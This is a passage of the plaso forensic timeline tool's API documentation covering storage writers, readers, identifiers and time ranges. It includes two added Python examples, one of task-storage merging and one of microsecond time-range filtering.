Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Returns event generator.
Return type generator(EventObject)
GetStorageType()
Retrieves the storage type of the underlying storage file.
Returns the storage type, or None if not available.
Return type str
GetWarnings()
Retrieves the warnings.
Returns warning generator.
Return type generator(ExtractionWarning)
HasAnalysisReports()
Determines if a store contains analysis reports.
Returns True if the store contains analysis reports.
Return type bool
HasEventTags()
Determines if a store contains event tags.
Returns True if the store contains event tags.
Return type bool
HasWarnings()
Determines if a store contains extraction warnings.
Returns True if the store contains extraction warnings.
Return type bool
ReadSystemConfiguration(knowledge_base)
Reads system configuration information.
The system configuration contains information about various system specific configuration data, for example the user accounts.
Parameters knowledge_base (KnowledgeBase) – is used to store the system configuration.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
class plaso.storage.file_interface.StorageFileWriter(session, output_file, storage_type='session', task=None)
Bases: plaso.storage.interface.StorageWriter
Defines an interface for a file-backed storage writer.
AddAnalysisReport(analysis_report, serialized_data=None)
Adds an analysis report.
Parameters
• analysis_report (AnalysisReport) – analysis report.
• serialized_data (Optional[bytes]) – serialized form of the analysis report.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – an event.
• serialized_data (Optional[bytes]) – serialized form of the event.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventDataStream(event_data_stream, serialized_data=None)
Adds an event data stream.
Parameters
• event_data_stream (EventDataStream) – event data stream.
• serialized_data (Optional[bytes]) – serialized form of the event data stream.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventSource(event_source, serialized_data=None)
Adds an event source.
Parameters
• event_source (EventSource) – an event source.
• serialized_data (Optional[bytes]) – serialized form of the event source.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – an event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddWarning(warning, serialized_data=None)
Adds a warning.
Parameters
• warning (ExtractionWarning) – an extraction warning.
• serialized_data (Optional[bytes]) – serialized form of the warning.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
Close()
Closes the storage writer.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
FinalizeTaskStorage(task)
Finalizes a processed task storage.
Moves the task storage file from its temporary directory to the processed directory.
Parameters task (Task) – task.
Raises
• IOError – if the storage type or format is not supported or if the storage file cannot be renamed.
• OSError – if the storage type or format is not supported or if the storage file cannot be renamed.
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (AttributeContainerIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
GetEventTags()
Retrieves the event tags.
Returns event tag generator.
Return type generator(EventTag)
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetFirstWrittenEventSource()
Retrieves the first event source that was written after open.
Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
Returns event source or None if there are no newly written ones.
Return type EventSource
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetNextWrittenEventSource()
Retrieves the next event source that was written after open.
Returns event source or None if there are no newly written ones.
Return type EventSource
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetProcessedTaskIdentifiers()
Retrieves the identifiers of tasks that have been processed.
Returns task identifiers that are processed.
Return type list[str]
Raises
• IOError – if the storage type is not supported or if the temporary path for the task storage does not exist.
• OSError – if the storage type is not supported or if the temporary path for the task storage does not exist.
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Returns event generator.
Return type generator(EventObject)
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
Open(**unused_kwargs)
Opens the storage writer.
Raises
• IOError – if the storage writer is already opened.
• OSError – if the storage writer is already opened.
PrepareMergeTaskStorage(task)
Prepares a task storage for merging.
Moves the task storage file from the processed directory to the merge directory.
Parameters task (Task) – task.
Raises
• IOError – if the storage type or format is not supported or if the storage file cannot be renamed.
• OSError – if the storage type or format is not supported or if the storage file cannot be renamed.
RemoveProcessedTaskStorage(task)
Removes a processed task storage.
Parameters task (Task) – task.
Raises
• IOError – if the storage type or format is not supported or if the storage file cannot be removed.
• OSError – if the storage type or format is not supported or if the storage file cannot be removed.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
StartMergeTaskStorage(task)
Starts a merge of a task store with the session storage.
Parameters task (Task) – task.
Returns storage merge reader of the task storage.
Return type StorageMergeReader
Raises
• IOError – if the storage file cannot be opened, if the storage type is not supported, if the temporary path for the task storage does not exist or if the temporary path for the task storage does not refer to a file.
• OSError – if the storage file cannot be opened, if the storage type is not supported, if the temporary path for the task storage does not exist or if the temporary path for the task storage does not refer to a file.
StartTaskStorage()
Creates a temporary path for the task storage.
Raises
• IOError – if the storage type is not supported or if the temporary path for the task storage already exists.
• OSError – if the storage type is not supported or if the temporary path for the task storage already exists.
StopTaskStorage(abort=False)
Removes the temporary path for the task storage.
The results of tasks will be lost on abort.
Parameters abort (bool) – True to indicate the stop is issued on abort.
Raises
• IOError – if the storage type is not supported.
• OSError – if the storage type is not supported.
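The task storage methods above (StartTaskStorage through StopTaskStorage, with CheckTaskReadyForMerge and GetProcessedTaskIdentifiers in between) describe one procedure: a worker writes the containers of a task to a file in a temporary directory, the file is renamed into a processed directory when the task finishes, moved again into a merge directory, read into the session store by a StorageMergeReader whose MergeAttributeContainers returns True once the file is fully consumed, and finally removed; StopTaskStorage tears the directories down and discards whatever was never merged. The Python example below, added for this page and not plaso's own implementation, walks through that lifecycle with os.rename and a JSON-lines task file. The directory names, the file format, the batch size and the sample containers are assumptions made for the example.

```python
# Example code, not plaso's own implementation: a task storage lifecycle modelled
# on the StorageFileWriter task methods documented above and on
# StorageMergeReader.MergeAttributeContainers. The directory names, the JSON-lines
# task file format and the sample containers are assumptions for this example.
import json
import os
import shutil
import tempfile


class TaskStorageMergeReader(object):
  """Merges one task file into the session writer, optionally in batches."""

  def __init__(self, storage_writer, path):
    self._storage_writer = storage_writer
    self._path = path
    self._file_object = None

  def MergeAttributeContainers(self, callback=None, maximum_number_of_containers=0):
    if maximum_number_of_containers < 0:
      raise ValueError('Maximum number of containers must not be negative.')
    if self._file_object is None:
      self._file_object = open(self._path, 'r', encoding='utf-8')
    for merged, line in enumerate(self._file_object, 1):   # resumes after a partial merge
      container = json.loads(line)
      self._storage_writer.AddAttributeContainer(container)
      if callback:
        callback(self._storage_writer, container)
      if maximum_number_of_containers and merged >= maximum_number_of_containers:
        return False                   # more to do; the caller re-invokes
    self._file_object.close()
    os.remove(self._path)              # consumed: nothing can merge it twice
    return True


class SessionStorageWriter(object):
  """Moves task files through temporary -> processed -> merge directories."""

  def __init__(self, root):
    self._root = root
    self._task_root = None
    self.containers = []

  def AddAttributeContainer(self, container):
    self.containers.append(container)

  def StartTaskStorage(self):
    self._task_root = os.path.join(self._root, 'task_storage')
    if os.path.exists(self._task_root):
      raise IOError('Task storage path already exists: {0:s}'.format(self._task_root))
    for stage in ('', 'processed', 'merge'):
      os.makedirs(os.path.join(self._task_root, stage))

  def _TaskPath(self, stage, task_identifier):
    return os.path.join(self._task_root, stage, task_identifier + '.jsonl')

  def CreateTaskStorage(self, task_identifier, containers):
    with open(self._TaskPath('', task_identifier), 'w', encoding='utf-8') as file_object:
      for container in containers:
        file_object.write(json.dumps(container, sort_keys=True) + '\n')

  def FinalizeTaskStorage(self, task_identifier):
    # rename is atomic on one file system, so processed/ never holds a partial file.
    os.rename(self._TaskPath('', task_identifier), self._TaskPath('processed', task_identifier))

  def CheckTaskReadyForMerge(self, task_identifier):
    return os.path.isfile(self._TaskPath('processed', task_identifier))

  def PrepareMergeTaskStorage(self, task_identifier):
    os.rename(self._TaskPath('processed', task_identifier), self._TaskPath('merge', task_identifier))

  def StartMergeTaskStorage(self, task_identifier):
    path = self._TaskPath('merge', task_identifier)
    if not os.path.isfile(path):
      raise IOError('Task storage file does not exist: {0:s}'.format(path))
    return TaskStorageMergeReader(self, path)

  def StopTaskStorage(self, abort=False):
    """Removes the tree; returns how many unmerged task files were discarded."""
    lost = sum(len(files) for _, _, files in os.walk(self._task_root))
    shutil.rmtree(self._task_root)     # on abort the results of those tasks are lost
    self._task_root = None
    return lost


def RunExample():
  """Constructed sample: task-a is merged in batches of two, task-b never finishes."""
  writer = SessionStorageWriter(tempfile.mkdtemp())
  writer.StartTaskStorage()
  writer.CreateTaskStorage('task-a', [
      {'type': 'event_data', 'filename': '/etc/passwd'},
      {'type': 'event', 'timestamp': 1601769600000000},
      {'type': 'event', 'timestamp': 1601856000000000}])
  writer.FinalizeTaskStorage('task-a')
  writer.CreateTaskStorage('task-b', [{'type': 'event', 'timestamp': 1601770000000000}])
  ready = (writer.CheckTaskReadyForMerge('task-a'), writer.CheckTaskReadyForMerge('task-b'))
  writer.PrepareMergeTaskStorage('task-a')
  reader = writer.StartMergeTaskStorage('task-a')
  batches = 1
  while not reader.MergeAttributeContainers(maximum_number_of_containers=2):
    batches += 1
  lost = writer.StopTaskStorage(abort=True)
  return ready, batches, len(writer.containers), lost, writer
```

MergeAttributeContainers keeps the file open between calls, so a caller can merge in bounded batches (maximum_number_of_containers) and resume; it deletes the task file only once it returns True, which is what makes a partially merged task safe to retry. The renames between directories are atomic on a single file system, so a task file is never visible in processed/ or merge/ in a half-written state.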
WriteSessionCompletion(aborted=False)
Writes session completion information.
Parameters aborted (Optional[bool]) – True if the session was aborted.
Raises
• IOError – if the storage type is not supported or when the storage writer is closed.
• OSError – if the storage type is not supported or when the storage writer is closed.
WriteSessionConfiguration()
Writes session configuration information.
Raises
• IOError – if the storage type does not support writing session configuration information or when the storage writer is closed.
• OSError – if the storage type does not support writing session configuration information or when the storage writer is closed.
WriteSessionStart()
Writes session start information.
Raises
• IOError – if the storage type is not supported or when the storage writer is closed.
• OSError – if the storage type is not supported or when the storage writer is closed.
WriteTaskCompletion(aborted=False)
Writes task completion information.
Parameters aborted (Optional[bool]) – True if the task was aborted.
Raises
• IOError – if the storage type is not supported or when the storage writer is closed.
• OSError – if the storage type is not supported or when the storage writer is closed.
WriteTaskStart()
Writes task start information.
Raises
• IOError – if the storage type is not supported or when the storage writer is closed.
• OSError – if the storage type is not supported or when the storage writer is closed.
plaso.storage.identifiers module
Storage attribute container identifier objects.
class plaso.storage.identifiers.FakeIdentifier(attribute_values_hash)
Bases: plaso.containers.interface.AttributeContainerIdentifier
Fake attribute container identifier intended for testing.
attribute_values_hash
hash value of the attribute values.
Type int
CopyToString()
Copies the identifier to a string representation.
Returns unique identifier or None.
Return type str
class plaso.storage.identifiers.RedisKeyIdentifier(identifier=None)
Bases: plaso.containers.interface.AttributeContainerIdentifier
Redis key attribute container identifier.
The identifier is used to uniquely identify attribute containers, for example where an attribute container is stored as JSON serialized data in a Redis instance.
identifier
unique identifier of a container.
Type UUID
CopyToString()
Copies the identifier to a string representation.
Returns unique identifier or None.
Return type str
class plaso.storage.identifiers.SQLTableIdentifier(name, row_identifier)
Bases: plaso.containers.interface.AttributeContainerIdentifier
SQL table attribute container identifier.
The identifier is used to uniquely identify attribute containers, for example where an attribute container is stored as JSON serialized data in a SQLite database file.
name
name of the table.
Type str
row_identifier
unique identifier of the row in the table.
Type int
CopyToString()
Copies the identifier to a string representation.
Returns unique identifier or None.
Return type str
class plaso.storage.identifiers.SerializedStreamIdentifier(stream_number, entry_index)
Bases: plaso.containers.interface.AttributeContainerIdentifier
Serialized stream attribute container identifier.
The identifier is used to uniquely identify attribute containers, for example where an attribute container is stored as JSON serialized data in a ZIP file.
stream_number
number of the serialized attribute container stream.
Type int
entry_index
number of the serialized event within the stream.
Type int
CopyToString()
Copies the identifier to a string representation.
Returns unique identifier or None.
Return type str
plaso.storage.interface module
The storage interface classes.
class plaso.storage.interface.BaseStore
Bases: object
Storage interface.
format_version
storage format version.
Type int
serialization_format
serialization format.
Type str
storage_type
storage type.
Type str
AddAnalysisReport(analysis_report, serialized_data=None)
Adds an analysis report.
Parameters
• analysis_report (AnalysisReport) – analysis report.
• serialized_data (Optional[bytes]) – serialized form of the analysis report.
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – event.
• serialized_data (Optional[bytes]) – serialized form of the event.
AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
AddEventDataStream(event_data_stream, serialized_data=None)
Adds an event data stream.
Parameters
• event_data_stream (EventDataStream) – event data stream.
• serialized_data (Optional[bytes]) – serialized form of the event data stream.
AddEventSource(event_source, serialized_data=None)
Adds an event source.
Parameters
• event_source (EventSource) – event source.
• serialized_data (Optional[bytes]) – serialized form of the event source.
AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
AddWarning(warning, serialized_data=None)
Adds a warning.
Parameters
• warning (ExtractionWarning) – warning.
• serialized_data (Optional[bytes]) – serialized form of the warning.
abstract Close()
Closes the store.
GetAnalysisReports()
Retrieves the analysis reports.
Returns analysis report generator.
Return type generator(AnalysisReport)
GetEventData()
Retrieves the event data.
Returns event data generator.
Return type generator(EventData)
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEventDataStreams()
Retrieves the event data streams.
Returns event data stream generator.
Return type generator(EventDataStream)
GetEventSources()
Retrieves the event sources.
Returns event source generator.
Return type generator(EventSource)
GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (AttributeContainerIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
Raises
• OSError – if an invalid identifier is provided.
• IOError – if an invalid identifier is provided.
GetEventTags()
Retrieves the event tags.
Returns event tag generator.
Return type generator(EventTag)
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
GetNumberOfAnalysisReports()
Retrieves the number of analysis reports.
Returns number of analysis reports.
Return type int
GetNumberOfEventSources()
Retrieves the number of event sources.
Returns number of event sources.
Return type int
GetSessions()
Retrieves the sessions.
Yields Session – session attribute container.
Raises
• IOError – if there is a mismatch in session identifiers between the session start and completion attribute containers.
• OSError – if there is a mismatch in session identifiers between the session start and completion attribute containers.
abstract GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the store including those pending being flushed (written) to the store.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Yields EventObject – event.
GetWarnings()
Retrieves the warnings.
Returns warning generator.
Return type generator(ExtractionWarning)
HasAnalysisReports()
Determines if a store contains analysis reports.
Returns True if the store contains analysis reports.
Return type bool
HasEventTags()
Determines if a store contains event tags.
Returns True if the store contains event tags.
Return type bool
HasWarnings()
Determines if a store contains extraction warnings.
Returns True if the store contains extraction warnings.
Return type bool
abstract Open(**kwargs)
Opens the storage.
ReadSystemConfiguration(knowledge_base)
Reads system configuration information.
The system configuration contains information about various system specific configuration data, for example the user accounts.
Parameters knowledge_base (KnowledgeBase) – is used to store the system configuration.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
WriteSessionCompletion(session_completion)
Writes session completion information.
Parameters session_completion (SessionCompletion) – session completion information.
Raises
• IOError – if the storage type does not support writing a session completion or the storage file is closed or read-only.
• OSError – if the storage type does not support writing a session completion or the storage file is closed or read-only.
WriteSessionConfiguration(session_configuration)
Writes session configuration information.
Parameters session_configuration (SessionConfiguration) – session configuration information.
Raises
• IOError – when the storage file is closed or read-only.
• OSError – when the storage file is closed or read-only.
WriteSessionStart(session_start)Writes session start information.
Parameters session_start (SessionStart) – session start information.
Raises
• IOError – if the storage type does not support writing a session start or the storage fileis closed or read-only.
• OSError – if the storage type does not support writing a session start or the storage fileis closed or read-only.
WriteTaskCompletion(task_completion)
Writes task completion information.
Parameters task_completion (TaskCompletion) – task completion information.
Raises
• IOError – if the storage type does not support writing a task completion or the storage file is closed or read-only.
• OSError – if the storage type does not support writing a task completion or the storage file is closed or read-only.
WriteTaskStart(task_start)
Writes task start information.
Parameters task_start (TaskStart) – task start information.
Raises
• IOError – if the storage type does not support writing a task start or the storage file is closed or read-only.
• OSError – if the storage type does not support writing a task start or the storage file is closed or read-only.
class plaso.storage.interface.StorageMergeReader(storage_writer)
Bases: object
Storage reader interface for merging.
abstract MergeAttributeContainers(callback=None, maximum_number_of_containers=0)
Reads attribute containers from a task store into the writer.
Parameters
• callback (function[StorageWriter, AttributeContainer]) – function to call after each attribute container is deserialized.
• maximum_number_of_containers (Optional[int]) – maximum number of containers to merge, where 0 represents no limit.
Returns True if the entire task storage file has been merged.
Return type bool
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
class plaso.storage.interface.StorageReader
Bases: object
Storage reader interface.
abstract Close()
Closes the storage reader.
abstract GetAnalysisReports()
Retrieves the analysis reports.
Yields AnalysisReport – analysis report.
abstract GetEventData()
Retrieves the event data.
Yields EventData – event data.
abstract GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
abstract GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
abstract GetEventDataStreams()
Retrieves the event data streams.
Yields EventDataStream – event data stream.
abstract GetEventSources()
Retrieves event sources.
Yields EventSourceObject – event source.
abstract GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (AttributeContainerIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
abstract GetEventTags()
Retrieves the event tags.
Yields EventTag – event tag.
abstract GetEvents()
Retrieves the events.
Yields EventObject – event.
abstract GetNumberOfAnalysisReports()
Retrieves the number of analysis reports.
Returns number of analysis reports.
Return type int
abstract GetNumberOfEventSources()
Retrieves the number of event sources.
Returns number of event sources.
Return type int
abstract GetSessions()
Retrieves the sessions.
Yields Session – session.
abstract GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Yields EventObject – event.
abstract GetWarnings()
Retrieves the warnings.
Yields ExtractionWarning – warning.
abstract HasAnalysisReports()
Determines if a store contains analysis reports.
Returns True if the store contains analysis reports.
Return type bool
abstract HasEventTags()
Determines if a store contains event tags.
Returns True if the store contains event tags.
Return type bool
abstract HasWarnings()
Determines if a store contains extraction warnings.
Returns True if the store contains extraction warnings.
Return type bool
abstract ReadSystemConfiguration(knowledge_base)
Reads system configuration information.
The system configuration contains information about various system specific configuration data, for example the user accounts.
Parameters knowledge_base (KnowledgeBase) – is used to store the system configuration.
abstract SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
abstract SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
__enter__()
Make usable with “with” statement.
__exit__(exception_type, value, traceback)
Make usable with “with” statement.
class plaso.storage.interface.StorageWriter(session, storage_type='session', task=None)
Bases: object
Storage writer interface.
number_of_analysis_reports
number of analysis reports written.
Type int
number_of_event_sources
number of event sources written.
Type int
number_of_event_tags
number of event tags written.
Type int
number_of_events
number of events written.
Type int
number_of_warnings
number of warnings written.
Type int
abstract AddAnalysisReport(analysis_report, serialized_data=None)
Adds an analysis report.
Parameters
• analysis_report (AnalysisReport) – a report.
• serialized_data (Optional[bytes]) – serialized form of the analysis report.
abstract AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – an event.
• serialized_data (Optional[bytes]) – serialized form of the event.
abstract AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
abstract AddEventDataStream(event_data_stream, serialized_data=None)
Adds an event data stream.
Parameters
• event_data_stream (EventDataStream) – event data stream.
• serialized_data (Optional[bytes]) – serialized form of the event data stream.
abstract AddEventSource(event_source, serialized_data=None)
Adds an event source.
Parameters
• event_source (EventSource) – an event source.
• serialized_data (Optional[bytes]) – serialized form of the event source.
abstract AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – an event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
abstract AddWarning(warning, serialized_data=None)
Adds a warning.
Parameters
• warning (ExtractionWarning) – a warning.
• serialized_data (Optional[bytes]) – serialized form of the warning.
abstract CheckTaskReadyForMerge(task)
Checks if a task is ready for merging into the store.
Parameters task (Task) – task.
Returns True if the task is ready to be merged.
Return type bool
abstract Close()
Closes the storage writer.
CreateTaskStorage(task, task_storage_format)
Creates a task store.
Parameters
• task (Task) – task.
• task_storage_format (str) – storage format to store task results.
Returns storage writer for the task store.
Return type StorageWriter
Raises NotImplementedError – since there is no implementation.
FinalizeTaskStorage(task)
Finalizes a processed task storage.
Parameters task (Task) – task.
Raises NotImplementedError – since there is no implementation.
abstract GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
abstract GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
abstract GetEvents()
Retrieves the events.
Yields EventObject – event.
abstract GetFirstWrittenEventSource()
Retrieves the first event source that was written after open.
Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
Returns event source or None if there are no newly written ones.
Return type EventSource
abstract GetNextWrittenEventSource()
Retrieves the next event source that was written after open.
Returns event source or None if there are no newly written ones.
Return type EventSource
abstract GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Yields EventObject – event.
abstract Open(**kwargs)
Opens the storage writer.
PrepareMergeTaskStorage(task)
Prepares a task storage for merging.
Parameters task (Task) – task.
Raises NotImplementedError – since there is no implementation.
RemoveProcessedTaskStorage(task)
Removes a processed task storage.
Parameters task (Task) – task.
Raises NotImplementedError – since there is no implementation.
abstract SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
abstract SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
abstract WriteSessionCompletion(aborted=False)
Writes session completion information.
Parameters aborted (Optional[bool]) – True if the session was aborted.
abstract WriteSessionConfiguration()
Writes session configuration information.
abstract WriteSessionStart()
Writes session start information.
abstract WriteTaskCompletion(aborted=False)
Writes task completion information.
Parameters aborted (Optional[bool]) – True if the session was aborted.
abstract WriteTaskStart()
Writes task start information.
plaso.storage.logger module
The storage sub module logger.
plaso.storage.time_range module
Storage time range objects.
class plaso.storage.time_range.TimeRange(start_timestamp, end_timestamp)
Bases: object
Date and time range.
The timestamps are integers containing the number of microseconds since January 1, 1970, 00:00:00 UTC.
duration
duration of the range in microseconds.
Type int
end_timestamp
timestamp that marks the end of the range.
Type int
start_timestamp
timestamp that marks the start of the range.
Type int
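The TimeRange attributes and the time_range filtering of GetSortedEvents() described above, as an added example that is not plaso's own code: a plain-Python reimplementation of the microsecond-since-epoch range, a helper that converts timezone-aware datetimes to that unit, and a sort-and-filter pass over constructed events. The helper names (UtcDateTime, ToTimestamp, Contains, DayRange, EventsOnDay), the list-based GetSortedEvents and the inclusive bounds are assumptions.

```python
import datetime

# Added example, not plaso's own code. It mirrors the TimeRange attributes
# documented above (start_timestamp, end_timestamp and duration, all in
# microseconds since 1970-01-01 00:00:00 UTC) and the time_range filtering of
# GetSortedEvents(); the helper names and the inclusive bounds are assumptions.

EPOCH = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)
ONE_MICROSECOND = datetime.timedelta(microseconds=1)
ONE_DAY = datetime.timedelta(days=1)


def UtcDateTime(year, month, day, hour=0, minute=0, second=0, microsecond=0):
    """Builds a timezone-aware UTC datetime (hypothetical helper)."""
    return datetime.datetime(
        year, month, day, hour, minute, second, microsecond,
        tzinfo=datetime.timezone.utc)


def ToTimestamp(date_time):
    """Converts a timezone-aware datetime to microseconds since the epoch.

    Naive datetimes are rejected on purpose: interpreting them in local time
    shifts every event by the analysis machine's UTC offset, which silently
    misplaces events in a timeline.
    """
    if date_time.tzinfo is None or date_time.utcoffset() is None:
        raise ValueError('datetime must be timezone-aware')
    # timedelta // timedelta yields an exact int; no float rounding involved.
    return (date_time - EPOCH) // ONE_MICROSECOND


class TimeRange(object):
    """Date and time range in microseconds since the epoch (reimplementation)."""

    def __init__(self, start_timestamp, end_timestamp):
        if start_timestamp > end_timestamp:
            raise ValueError('start timestamp must not be after end timestamp')
        self.start_timestamp = start_timestamp
        self.end_timestamp = end_timestamp
        self.duration = end_timestamp - start_timestamp

    def Contains(self, timestamp):
        """Returns True if the timestamp lies in the range (assumed inclusive)."""
        return self.start_timestamp <= timestamp <= self.end_timestamp


def GetSortedEvents(events, time_range=None):
    """Yields events in increasing chronological order, optionally filtered.

    Each event is a dict with an integer 'timestamp' in microseconds. A value
    recorded in seconds by mistake lands in January 1970 and is dropped by any
    range in 2020 without an error, so unit discipline matters.
    """
    for event in sorted(events, key=lambda event: event['timestamp']):
        if time_range is None or time_range.Contains(event['timestamp']):
            yield event


# Constructed sample events: out of order, one just before and one just after
# the day of interest.
SAMPLE_EVENTS = [
    {'timestamp': ToTimestamp(UtcDateTime(2020, 10, 7, 12, 0)),
     'message': 'login'},
    {'timestamp': ToTimestamp(UtcDateTime(2020, 10, 6, 23, 59, 59, 999999)),
     'message': 'old'},
    {'timestamp': ToTimestamp(UtcDateTime(2020, 10, 8, 0, 0)),
     'message': 'logout'},
    {'timestamp': ToTimestamp(UtcDateTime(2020, 10, 7, 9, 30)),
     'message': 'service start'},
]


def DayRange(year, month, day):
    """Returns a TimeRange covering one UTC calendar day, last microsecond included."""
    start = UtcDateTime(year, month, day)
    end = start + ONE_DAY - ONE_MICROSECOND
    return TimeRange(ToTimestamp(start), ToTimestamp(end))


def EventsOnDay(events, year, month, day):
    """Returns the messages of the events on the given UTC day, oldest first."""
    time_range = DayRange(year, month, day)
    return [event['message'] for event in GetSortedEvents(events, time_range)]


if __name__ == '__main__':
    print(EventsOnDay(SAMPLE_EVENTS, 2020, 10, 7))  # ['service start', 'login']
```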
Module contents
5.1.15 plaso.unix package
Module contents
5.1.16 plaso.winnt package
Submodules
plaso.winnt.known_folder_ids module
This file contains the Windows NT Known Folder identifier definitions.
plaso.winnt.language_ids module
This file contains the Windows NT Language identifiers.
plaso.winnt.shell_folder_ids module
This file contains the Windows NT shell folder identifier definitions.
plaso.winnt.time_zones module
This file contains the Windows NT time zone definitions.
The Windows time zone names can be obtained from the following Windows Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
Module contents
5.2 Submodules
5.3 plaso.dependencies module
Functionality to check for the availability and version of dependencies.
This file is generated by l2tdevtools update-dependencies.py, any dependency related changes should be made in dependencies.ini.
plaso.dependencies.CheckDependencies(verbose_output=True)
Checks the availability of the dependencies.
Parameters verbose_output (Optional[bool]) – True if output should be verbose.
Returns True if the dependencies are available, False otherwise.
Return type bool
5.4 Module contents
Super timeline all the things (Plaso Langar Að Safna Öllu).
log2timeline is a tool designed to extract timestamps from various files found on a typical computer system(s) and aggregate them. Plaso is the Python rewrite of log2timeline.
PYTHON MODULE INDEX
p
plaso, 491
plaso.analysis, 54
plaso.analysis.browser_search, 39
plaso.analysis.chrome_extension, 40
plaso.analysis.definitions, 40
plaso.analysis.file_hashes, 41
plaso.analysis.hash_tagging, 41
plaso.analysis.interface, 44
plaso.analysis.logger, 45
plaso.analysis.manager, 45
plaso.analysis.mediator, 46
